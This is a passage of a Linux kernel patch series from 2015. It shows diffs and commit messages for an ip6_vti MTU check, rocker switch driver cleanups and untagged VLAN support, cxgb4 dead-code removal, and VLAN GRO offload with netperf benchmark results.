b/net/ipv6/ip6_vti.c index ff3bd863fa03..0224c032dca5 100644 --- a/net/ipv6/ip6_vti.c +++ b/net/ipv6/ip6_vti.c @@ -435,6 +435,7 @@ vti6_xmit(struct sk_buff *skb, struct net_device *dev, struct flowi *fl) struct net_device *tdev; struct xfrm_state *x; int err = -1; + int mtu; if (!dst) goto tx_err_link_failure; @@ -468,6 +469,19 @@ vti6_xmit(struct sk_buff *skb, struct net_device *dev, struct flowi *fl) skb_dst_set(skb, dst); skb->dev = skb_dst(skb)->dev; + mtu = dst_mtu(dst); + if (!skb->ignore_df && skb->len > mtu) { + skb_dst(skb)->ops->update_pmtu(dst, NULL, skb, mtu); + + if (skb->protocol == htons(ETH_P_IPV6)) + icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, mtu); + else + icmp_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED, + htonl(mtu)); + + return -EMSGSIZE; + } + err = dst_output(skb); if (net_xmit_eval(err) == 0) { struct pcpu_sw_netstats *tstats = this_cpu_ptr(dev->tstats); From 534ba6a87d46733b896baa741e8e2f7e722d27c5 Mon Sep 17 00:00:00 2001 From: Simon Horman Date: Mon, 1 Jun 2015 13:25:04 +0900 Subject: [PATCH 567/872] rocker: remove rocker parameter from functions that have rocker_port parameter The rocker (switch) of a rocker_port may be trivially obtained from the latter it seems cleaner not to pass the former to a function when the latter is being passed anyway. rocker_port_rx_proc() is omitted from this change as it is a hot path case. Signed-off-by: Simon Horman Acked-by: Scott Feldman Acked-by: Andy Gospodarek Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 115 +++++++++++---------------- 1 file changed, 45 insertions(+), 70 deletions(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index 36f7edfc3c7a..d246647b3653 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -1172,11 +1172,11 @@ static void rocker_dma_rings_fini(struct rocker *rocker) rocker_dma_ring_destroy(rocker, &rocker->cmd_ring); } -static int rocker_dma_rx_ring_skb_map(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_dma_rx_ring_skb_map(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, struct sk_buff *skb, size_t buf_len) { + const struct rocker *rocker = rocker_port->rocker; struct pci_dev *pdev = rocker->pdev; dma_addr_t dma_handle; @@ -1201,8 +1201,7 @@ static size_t rocker_port_rx_buf_len(const struct rocker_port *rocker_port) return rocker_port->dev->mtu + ETH_HLEN + ETH_FCS_LEN + VLAN_HLEN; } -static int rocker_dma_rx_ring_skb_alloc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_dma_rx_ring_skb_alloc(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info) { struct net_device *dev = rocker_port->dev; @@ -1219,8 +1218,7 @@ static int rocker_dma_rx_ring_skb_alloc(const struct rocker *rocker, skb = netdev_alloc_skb_ip_align(dev, buf_len); if (!skb) return -ENOMEM; - err = rocker_dma_rx_ring_skb_map(rocker, rocker_port, desc_info, - skb, buf_len); + err = rocker_dma_rx_ring_skb_map(rocker_port, desc_info, skb, buf_len); if (err) { dev_kfree_skb_any(skb); return err; @@ -1257,15 +1255,15 @@ static void rocker_dma_rx_ring_skb_free(const struct rocker *rocker, dev_kfree_skb_any(skb); } -static int rocker_dma_rx_ring_skbs_alloc(const struct rocker *rocker, - const struct rocker_port *rocker_port) +static int rocker_dma_rx_ring_skbs_alloc(const struct rocker_port *rocker_port) { const struct rocker_dma_ring_info *rx_ring = &rocker_port->rx_ring; + const struct rocker *rocker = rocker_port->rocker; int i; int err; for (i = 0; i < rx_ring->size; i++) { - err = rocker_dma_rx_ring_skb_alloc(rocker, rocker_port, + err = rocker_dma_rx_ring_skb_alloc(rocker_port, &rx_ring->desc_info[i]); if (err) goto rollback; @@ -1278,10 +1276,10 @@ static int rocker_dma_rx_ring_skbs_alloc(const struct rocker *rocker, return err; } -static void rocker_dma_rx_ring_skbs_free(const struct rocker *rocker, - const struct rocker_port *rocker_port) +static void rocker_dma_rx_ring_skbs_free(const struct rocker_port *rocker_port) { const struct rocker_dma_ring_info *rx_ring = &rocker_port->rx_ring; + const struct rocker *rocker = rocker_port->rocker; int i; for (i = 0; i < rx_ring->size; i++) @@ -1327,7 +1325,7 @@ static int rocker_port_dma_rings_init(struct rocker_port *rocker_port) goto err_dma_rx_ring_bufs_alloc; } - err = rocker_dma_rx_ring_skbs_alloc(rocker, rocker_port); + err = rocker_dma_rx_ring_skbs_alloc(rocker_port); if (err) { netdev_err(rocker_port->dev, "failed to alloc rx dma ring skbs\n"); goto err_dma_rx_ring_skbs_alloc; @@ -1353,7 +1351,7 @@ static void rocker_port_dma_rings_fini(struct rocker_port *rocker_port) { struct rocker *rocker = rocker_port->rocker; - rocker_dma_rx_ring_skbs_free(rocker, rocker_port); + rocker_dma_rx_ring_skbs_free(rocker_port); rocker_dma_ring_bufs_free(rocker, &rocker_port->rx_ring, PCI_DMA_BIDIRECTIONAL); rocker_dma_ring_destroy(rocker, &rocker_port->rx_ring); @@ -1588,22 +1586,20 @@ static irqreturn_t rocker_rx_irq_handler(int irq, void *dev_id) * Command interface ********************/ -typedef int (*rocker_cmd_prep_cb_t)(const struct rocker *rocker, - const struct rocker_port *rocker_port, +typedef int (*rocker_cmd_prep_cb_t)(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv); -typedef int (*rocker_cmd_proc_cb_t)(const struct rocker *rocker, - const struct rocker_port *rocker_port, +typedef int (*rocker_cmd_proc_cb_t)(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv); -static int rocker_cmd_exec(struct rocker *rocker, - struct rocker_port *rocker_port, +static int rocker_cmd_exec(struct rocker_port *rocker_port, enum switchdev_trans trans, rocker_cmd_prep_cb_t prepare, void *prepare_priv, rocker_cmd_proc_cb_t process, void *process_priv) { + struct rocker *rocker = rocker_port->rocker; struct rocker_desc_info *desc_info; struct rocker_wait *wait; unsigned long flags; @@ -1622,7 +1618,7 @@ static int rocker_cmd_exec(struct rocker *rocker, goto out; } - err = prepare(rocker, rocker_port, desc_info, prepare_priv); + err = prepare(rocker_port, desc_info, prepare_priv); if (err) { spin_unlock_irqrestore(&rocker->cmd_ring_lock, flags); goto out; @@ -1644,7 +1640,7 @@ static int rocker_cmd_exec(struct rocker *rocker, return err; if (process) - err = process(rocker, rocker_port, desc_info, process_priv); + err = process(rocker_port, desc_info, process_priv); rocker_desc_gen_clear(desc_info); out: @@ -1653,8 +1649,7 @@ static int rocker_cmd_exec(struct rocker *rocker, } static int -rocker_cmd_get_port_settings_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_settings_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -1674,8 +1669,7 @@ rocker_cmd_get_port_settings_prep(const struct rocker *rocker, } static int -rocker_cmd_get_port_settings_ethtool_proc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_settings_ethtool_proc(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv) { @@ -1713,8 +1707,7 @@ rocker_cmd_get_port_settings_ethtool_proc(const struct rocker *rocker, } static int -rocker_cmd_get_port_settings_macaddr_proc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_settings_macaddr_proc(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv) { @@ -1746,8 +1739,7 @@ struct port_name { }; static int -rocker_cmd_get_port_settings_phys_name_proc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_settings_phys_name_proc(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv) { @@ -1788,8 +1780,7 @@ rocker_cmd_get_port_settings_phys_name_proc(const struct rocker *rocker, } static int -rocker_cmd_set_port_settings_ethtool_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_set_port_settings_ethtool_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -1819,8 +1810,7 @@ rocker_cmd_set_port_settings_ethtool_prep(const struct rocker *rocker, } static int -rocker_cmd_set_port_settings_macaddr_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_set_port_settings_macaddr_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -1844,8 +1834,7 @@ rocker_cmd_set_port_settings_macaddr_prep(const struct rocker *rocker, } static int -rocker_cmd_set_port_learning_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_set_port_learning_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -1870,8 +1859,7 @@ rocker_cmd_set_port_learning_prep(const struct rocker *rocker, static int rocker_cmd_get_port_settings_ethtool(struct rocker_port *rocker_port, struct ethtool_cmd *ecmd) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_get_port_settings_prep, NULL, rocker_cmd_get_port_settings_ethtool_proc, ecmd); @@ -1880,8 +1868,7 @@ static int rocker_cmd_get_port_settings_ethtool(struct rocker_port *rocker_port, static int rocker_cmd_get_port_settings_macaddr(struct rocker_port *rocker_port, unsigned char *macaddr) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_get_port_settings_prep, NULL, rocker_cmd_get_port_settings_macaddr_proc, macaddr); @@ -1890,8 +1877,7 @@ static int rocker_cmd_get_port_settings_macaddr(struct rocker_port *rocker_port, static int rocker_cmd_set_port_settings_ethtool(struct rocker_port *rocker_port, struct ethtool_cmd *ecmd) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_set_port_settings_ethtool_prep, ecmd, NULL, NULL); } @@ -1899,8 +1885,7 @@ static int rocker_cmd_set_port_settings_ethtool(struct rocker_port *rocker_port, static int rocker_cmd_set_port_settings_macaddr(struct rocker_port *rocker_port, unsigned char *macaddr) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_set_port_settings_macaddr_prep, macaddr, NULL, NULL); } @@ -1908,7 +1893,7 @@ static int rocker_cmd_set_port_settings_macaddr(struct rocker_port *rocker_port, static int rocker_port_set_learning(struct rocker_port *rocker_port, enum switchdev_trans trans) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, trans, + return rocker_cmd_exec(rocker_port, trans, rocker_cmd_set_port_learning_prep, NULL, NULL, NULL); } @@ -2114,8 +2099,7 @@ rocker_cmd_flow_tbl_add_acl(struct rocker_desc_info *desc_info, return 0; } -static int rocker_cmd_flow_tbl_add(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_cmd_flow_tbl_add(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -2172,8 +2156,7 @@ static int rocker_cmd_flow_tbl_add(const struct rocker *rocker, return 0; } -static int rocker_cmd_flow_tbl_del(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_cmd_flow_tbl_del(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -2282,8 +2265,7 @@ rocker_cmd_group_tbl_add_l3_unicast(struct rocker_desc_info *desc_info, return 0; } -static int rocker_cmd_group_tbl_add(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_cmd_group_tbl_add(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -2328,8 +2310,7 @@ static int rocker_cmd_group_tbl_add(const struct rocker *rocker, return 0; } -static int rocker_cmd_group_tbl_del(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_cmd_group_tbl_del(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -2460,8 +2441,7 @@ static int rocker_flow_tbl_add(struct rocker_port *rocker_port, spin_unlock_irqrestore(&rocker->flow_tbl_lock, flags); - return rocker_cmd_exec(rocker, rocker_port, trans, - rocker_cmd_flow_tbl_add, + return rocker_cmd_exec(rocker_port, trans, rocker_cmd_flow_tbl_add, found, NULL, NULL); } @@ -2492,7 +2472,7 @@ static int rocker_flow_tbl_del(struct rocker_port *rocker_port, rocker_port_kfree(trans, match); if (found) { - err = rocker_cmd_exec(rocker, rocker_port, trans, + err = rocker_cmd_exec(rocker_port, trans, rocker_cmd_flow_tbl_del, found, NULL, NULL); rocker_port_kfree(trans, found); @@ -2782,8 +2762,7 @@ static int rocker_group_tbl_add(struct rocker_port *rocker_port, spin_unlock_irqrestore(&rocker->group_tbl_lock, flags); - return rocker_cmd_exec(rocker, rocker_port, trans, - rocker_cmd_group_tbl_add, + return rocker_cmd_exec(rocker_port, trans, rocker_cmd_group_tbl_add, found, NULL, NULL); } @@ -2811,7 +2790,7 @@ static int rocker_group_tbl_del(struct rocker_port *rocker_port, rocker_group_tbl_entry_free(trans, match); if (found) { - err = rocker_cmd_exec(rocker, rocker_port, trans, + err = rocker_cmd_exec(rocker_port, trans, rocker_cmd_group_tbl_del, found, NULL, NULL); rocker_group_tbl_entry_free(trans, found); @@ -4219,8 +4198,7 @@ static int rocker_port_get_phys_port_name(struct net_device *dev, struct port_name name = { .buf = buf, .len = len }; int err; - err = rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + err = rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_get_port_settings_prep, NULL, rocker_cmd_get_port_settings_phys_name_proc, &name); @@ -4600,8 +4578,7 @@ static void rocker_port_get_strings(struct net_device *netdev, u32 stringset, } static int -rocker_cmd_get_port_stats_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_stats_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -4625,8 +4602,7 @@ rocker_cmd_get_port_stats_prep(const struct rocker *rocker, } static int -rocker_cmd_get_port_stats_ethtool_proc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_stats_ethtool_proc(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv) { @@ -4666,8 +4642,7 @@ rocker_cmd_get_port_stats_ethtool_proc(const struct rocker *rocker, static int rocker_cmd_get_port_stats_ethtool(struct rocker_port *rocker_port, void *priv) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_get_port_stats_prep, NULL, rocker_cmd_get_port_stats_ethtool_proc, priv); @@ -4780,7 +4755,7 @@ static int rocker_port_rx_proc(const struct rocker *rocker, netif_receive_skb(skb); - return rocker_dma_rx_ring_skb_alloc(rocker, rocker_port, desc_info); + return rocker_dma_rx_ring_skb_alloc(rocker_port, desc_info); } static struct rocker_port *rocker_port_napi_rx_get(struct napi_struct *napi) @@ -4858,9 +4833,9 @@ static void rocker_remove_ports(const struct rocker *rocker) kfree(rocker->ports); } -static void rocker_port_dev_addr_init(const struct rocker *rocker, - struct rocker_port *rocker_port) +static void rocker_port_dev_addr_init(struct rocker_port *rocker_port) { + const struct rocker *rocker = rocker_port->rocker; const struct pci_dev *pdev = rocker->pdev; int err; @@ -4890,7 +4865,7 @@ static int rocker_probe_port(struct rocker *rocker, unsigned int port_number) rocker_port->brport_flags = BR_LEARNING | BR_LEARNING_SYNC; INIT_LIST_HEAD(&rocker_port->trans_mem); - rocker_port_dev_addr_init(rocker, rocker_port); + rocker_port_dev_addr_init(rocker_port); dev->netdev_ops = &rocker_port_netdev_ops; dev->ethtool_ops = &rocker_port_ethtool_ops; dev->switchdev_ops = &rocker_port_switchdev_ops; From 661b689bbd2e9392c3d9935e791af75ddbc455dc Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Mon, 1 Jun 2015 20:07:41 +0530 Subject: [PATCH 568/872] cxgb4: remove unused fn to enable/disable db coalescing Remove unused function cxgb4_enable_db_coalescing() and cxgb4_disable_db_coalescing() Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 19 ------------------- .../net/ethernet/chelsio/cxgb4/cxgb4_uld.h | 2 -- 2 files changed, 21 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 4f69b5237129..974b27ce6a70 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -2069,25 +2069,6 @@ int cxgb4_sync_txq_pidx(struct net_device *dev, u16 qid, u16 pidx, } EXPORT_SYMBOL(cxgb4_sync_txq_pidx); -void cxgb4_disable_db_coalescing(struct net_device *dev) -{ - struct adapter *adap; - - adap = netdev2adap(dev); - t4_set_reg_field(adap, SGE_DOORBELL_CONTROL_A, NOCOALESCE_F, - NOCOALESCE_F); -} -EXPORT_SYMBOL(cxgb4_disable_db_coalescing); - -void cxgb4_enable_db_coalescing(struct net_device *dev) -{ - struct adapter *adap; - - adap = netdev2adap(dev); - t4_set_reg_field(adap, SGE_DOORBELL_CONTROL_A, NOCOALESCE_F, 0); -} -EXPORT_SYMBOL(cxgb4_enable_db_coalescing); - int cxgb4_read_tpte(struct net_device *dev, u32 stag, __be32 *tpte) { struct adapter *adap; diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.h index df34293f35e8..14e8110b5dbb 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.h @@ -298,8 +298,6 @@ struct sk_buff *cxgb4_pktgl_to_skb(const struct pkt_gl *gl, unsigned int skb_len, unsigned int pull_len); int cxgb4_sync_txq_pidx(struct net_device *dev, u16 qid, u16 pidx, u16 size); int cxgb4_flush_eq_cache(struct net_device *dev); -void cxgb4_disable_db_coalescing(struct net_device *dev); -void cxgb4_enable_db_coalescing(struct net_device *dev); int cxgb4_read_tpte(struct net_device *dev, u32 stag, __be32 *tpte); u64 cxgb4_read_sge_timestamp(struct net_device *dev); From 66e5133f19e901a044fa5eaeeb6ecff4545839e5 Mon Sep 17 00:00:00 2001 From: Toshiaki Makita Date: Mon, 1 Jun 2015 21:55:06 +0900 Subject: [PATCH 569/872] vlan: Add GRO support for non hardware accelerated vlan Currently packets with non-hardware-accelerated vlan cannot be handled by GRO. This causes low performance for 802.1ad and stacked vlan, as their vlan tags are currently not stripped by hardware. This patch adds GRO support for non-hardware-accelerated vlan and improves receive performance of them. Test Environment: vlan device (.1Q) on vlan device (.1ad) on ixgbe (82599) Result: - Before $ netperf -t TCP_STREAM -H 192.168.20.2 -l 60 Recv Send Send Socket Socket Message Elapsed Size Size Size Time Throughput bytes bytes bytes secs. 10^6bits/sec 87380 16384 16384 60.00 5233.17 Rx side CPU usage: %usr %sys %irq %soft %idle 0.27 58.03 0.00 41.70 0.00 - After $ netperf -t TCP_STREAM -H 192.168.20.2 -l 60 Recv Send Send Socket Socket Message Elapsed Size Size Size Time Throughput bytes bytes bytes secs. 10^6bits/sec 87380 16384 16384 60.00 7586.85 Rx side CPU usage: %usr %sys %irq %soft %idle 0.50 25.83 0.00 59.53 14.14 [ Register VLAN offloads with priority 10 -DaveM ] Signed-off-by: Toshiaki Makita Signed-off-by: David S. Miller --- include/linux/if_vlan.h | 20 +++++++++ net/8021q/vlan.c | 96 +++++++++++++++++++++++++++++++++++++++++ 2 files changed, 116 insertions(+) diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h index a40d29846ac2..67ce5bd3b56a 100644 --- a/include/linux/if_vlan.h +++ b/include/linux/if_vlan.h @@ -628,4 +628,24 @@ static inline netdev_features_t vlan_features_check(const struct sk_buff *skb, return features; } +/** + * compare_vlan_header - Compare two vlan headers + * @h1: Pointer to vlan header + * @h2: Pointer to vlan header + * + * Compare two vlan headers, returns 0 if equal. + * + * Please note that alignment of h1 & h2 are only guaranteed to be 16 bits. + */ +static inline unsigned long compare_vlan_header(const struct vlan_hdr *h1, + const struct vlan_hdr *h2) +{ +#if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS) + return *(u32 *)h1 ^ *(u32 *)h2; +#else + return ((__force u32)h1->h_vlan_TCI ^ (__force u32)h2->h_vlan_TCI) | + ((__force u32)h1->h_vlan_encapsulated_proto ^ + (__force u32)h2->h_vlan_encapsulated_proto); +#endif +} #endif /* !(_LINUX_IF_VLAN_H_) */ diff --git a/net/8021q/vlan.c b/net/8021q/vlan.c index 59555f0f8fc8..d2cd9de4b724 100644 --- a/net/8021q/vlan.c +++ b/net/8021q/vlan.c @@ -618,6 +618,92 @@ static int vlan_ioctl_handler(struct net *net, void __user *arg) return err; } +static struct sk_buff **vlan_gro_receive(struct sk_buff **head, + struct sk_buff *skb) +{ + struct sk_buff *p, **pp = NULL; + struct vlan_hdr *vhdr; + unsigned int hlen, off_vlan; + const struct packet_offload *ptype; + __be16 type; + int flush = 1; + + off_vlan = skb_gro_offset(skb); + hlen = off_vlan + sizeof(*vhdr); + vhdr = skb_gro_header_fast(skb, off_vlan); + if (skb_gro_header_hard(skb, hlen)) { + vhdr = skb_gro_header_slow(skb, hlen, off_vlan); + if (unlikely(!vhdr)) + goto out; + } + + type = vhdr->h_vlan_encapsulated_proto; + + rcu_read_lock(); + ptype = gro_find_receive_by_type(type); + if (!ptype) + goto out_unlock; + + flush = 0; + + for (p = *head; p; p = p->next) { + struct vlan_hdr *vhdr2; + + if (!NAPI_GRO_CB(p)->same_flow) + continue; + + vhdr2 = (struct vlan_hdr *)(p->data + off_vlan); + if (compare_vlan_header(vhdr, vhdr2)) + NAPI_GRO_CB(p)->same_flow = 0; + } + + skb_gro_pull(skb, sizeof(*vhdr)); + skb_gro_postpull_rcsum(skb, vhdr, sizeof(*vhdr)); + pp = ptype->callbacks.gro_receive(head, skb); + +out_unlock: + rcu_read_unlock(); +out: + NAPI_GRO_CB(skb)->flush |= flush; + + return pp; +} + +static int vlan_gro_complete(struct sk_buff *skb, int nhoff) +{ + struct vlan_hdr *vhdr = (struct vlan_hdr *)(skb->data + nhoff); + __be16 type = vhdr->h_vlan_encapsulated_proto; + struct packet_offload *ptype; + int err = -ENOENT; + + rcu_read_lock(); + ptype = gro_find_complete_by_type(type); + if (ptype) + err = ptype->callbacks.gro_complete(skb, nhoff + sizeof(*vhdr)); + + rcu_read_unlock(); + return err; +} + +static struct packet_offload vlan_packet_offloads[] __read_mostly = { + { + .type = cpu_to_be16(ETH_P_8021Q), + .priority = 10, + .callbacks = { + .gro_receive = vlan_gro_receive, + .gro_complete = vlan_gro_complete, + }, + }, + { + .type = cpu_to_be16(ETH_P_8021AD), + .priority = 10, + .callbacks = { + .gro_receive = vlan_gro_receive, + .gro_complete = vlan_gro_complete, + }, + }, +}; + static int __net_init vlan_init_net(struct net *net) { struct vlan_net *vn = net_generic(net, vlan_net_id); @@ -645,6 +731,7 @@ static struct pernet_operations vlan_net_ops = { static int __init vlan_proto_init(void) { int err; + unsigned int i; pr_info("%s v%s\n", vlan_fullname, vlan_version); @@ -668,6 +755,9 @@ static int __init vlan_proto_init(void) if (err < 0) goto err5; + for (i = 0; i < ARRAY_SIZE(vlan_packet_offloads); i++) + dev_add_offload(&vlan_packet_offloads[i]); + vlan_ioctl_set(vlan_ioctl_handler); return 0; @@ -685,7 +775,13 @@ static int __init vlan_proto_init(void) static void __exit vlan_cleanup_module(void) { + unsigned int i; + vlan_ioctl_set(NULL); + + for (i = 0; i < ARRAY_SIZE(vlan_packet_offloads); i++) + dev_remove_offload(&vlan_packet_offloads[i]); + vlan_netlink_fini(); unregister_netdevice_notifier(&vlan_notifier_block); From 27b808cbc2ad72608fb2fd9abd81930d32464546 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:02 -0700 Subject: [PATCH 570/872] rocker: zero allocate ports array When allocating the array of rocker port pointers, zero the array values so we can test for !NULL to see if port is allocated/registered. We'll need this later when installing untagged VLAN support for each port, during port probe. It's a long story, but to install a VLAN (vid=0 for untagged, in this case) on a port, we'll need to scan other ports to see if the VLAN group for that VLAN has been setup. To scan the other ports, we need to walk the port array. Signed-off-by: Scott Feldman Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index d246647b3653..b0fb24509124 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -4911,7 +4911,7 @@ static int rocker_probe_ports(struct rocker *rocker) int err; alloc_size = sizeof(struct rocker_port *) * rocker->port_count; - rocker->ports = kmalloc(alloc_size, GFP_KERNEL); + rocker->ports = kzalloc(alloc_size, GFP_KERNEL); if (!rocker->ports) return -ENOMEM; for (i = 0; i < rocker->port_count; i++) { From cec04a60bcd72ce43618ca62da5e0f508e694703 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:03 -0700 Subject: [PATCH 571/872] rocker: cleanup vlan table on error adding vlan Basic house keeping: If there is an error adding the router MAC for this vlan, removing the just installed VLAN table entry to leave device in same state as before failure. Signed-off-by: Scott Feldman Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index b0fb24509124..bba9557372a7 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -4320,7 +4320,12 @@ static int rocker_port_vlan_add(struct rocker_port *rocker_port, if (err) return err; - return rocker_port_router_mac(rocker_port, trans, 0, htons(vid)); + err = rocker_port_router_mac(rocker_port, trans, 0, htons(vid)); + if (err) + rocker_port_vlan(rocker_port, trans, + ROCKER_OP_FLAG_REMOVE, vid); + + return err; } static int rocker_port_vlans_add(struct rocker_port *rocker_port, From bcfd780144371fa0156176fa5518d4dabcd5aab9 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:04 -0700 Subject: [PATCH 572/872] rocker: install untagged VLAN (vid=0) support for each port On port probe, install by default untagged VLAN support. This is equivalent to running the command: bridge vlan add vid 0 dev DEV self A user could, if they wanted, manaully removing untagged support from the port by running the command: bridge vlan del vid 0 dev DEV self But installing it by default on port initialization gives the normal expected behavior. Signed-off-by: Scott Feldman Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 20 +++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index bba9557372a7..076f3f29fe5c 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -3136,6 +3136,8 @@ static int rocker_port_vlan_flood_group(struct rocker_port *rocker_port, for (i = 0; i < rocker->port_count; i++) { p = rocker->ports[i]; + if (!p) + continue; if (!rocker_port_is_bridged(p)) continue; if (test_bit(ntohs(vlan_id), p->vlan_bitmap)) { @@ -3195,7 +3197,7 @@ static int rocker_port_vlan_l2_groups(struct rocker_port *rocker_port, for (i = 0; i < rocker->port_count; i++) { p = rocker->ports[i]; - if (test_bit(ntohs(vlan_id), p->vlan_bitmap)) + if (p && test_bit(ntohs(vlan_id), p->vlan_bitmap)) ref++; } @@ -4857,6 +4859,7 @@ static int rocker_probe_port(struct rocker *rocker, unsigned int port_number) const struct pci_dev *pdev = rocker->pdev; struct rocker_port *rocker_port; struct net_device *dev; + u16 untagged_vid = 0; int err; dev = alloc_etherdev(sizeof(struct rocker_port)); @@ -4892,16 +4895,27 @@ static int rocker_probe_port(struct rocker *rocker, unsigned int port_number) rocker_port_set_learning(rocker_port, SWITCHDEV_TRANS_NONE); - rocker_port->internal_vlan_id = - rocker_port_internal_vlan_id_get(rocker_port, dev->ifindex); err = rocker_port_ig_tbl(rocker_port, SWITCHDEV_TRANS_NONE, 0); if (err) { dev_err(&pdev->dev, "install ig port table failed\n"); goto err_port_ig_tbl; } + rocker_port->internal_vlan_id = + rocker_port_internal_vlan_id_get(rocker_port, dev->ifindex); + + err = rocker_port_vlan_add(rocker_port, SWITCHDEV_TRANS_NONE, + untagged_vid, 0); + if (err) { + netdev_err(rocker_port->dev, "install untagged VLAN failed\n"); + goto err_untagged_vlan; + } + return 0; +err_untagged_vlan: + rocker_port_ig_tbl(rocker_port, SWITCHDEV_TRANS_NONE, + ROCKER_OP_FLAG_REMOVE); err_port_ig_tbl: unregister_netdev(dev); err_register_netdev: From 027e00dc0bc7049e66124a3943efa9defa5cd835 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:05 -0700 Subject: [PATCH 573/872] rocker: install/remove router MAC for untagged VLAN when joining/leaving bridge When the port joins a bridge, the port's internal VLAN ID needs to change to the bridge's internal VLAN ID. Likewise, when leaving the bridge, the internal VLAN ID reverts back 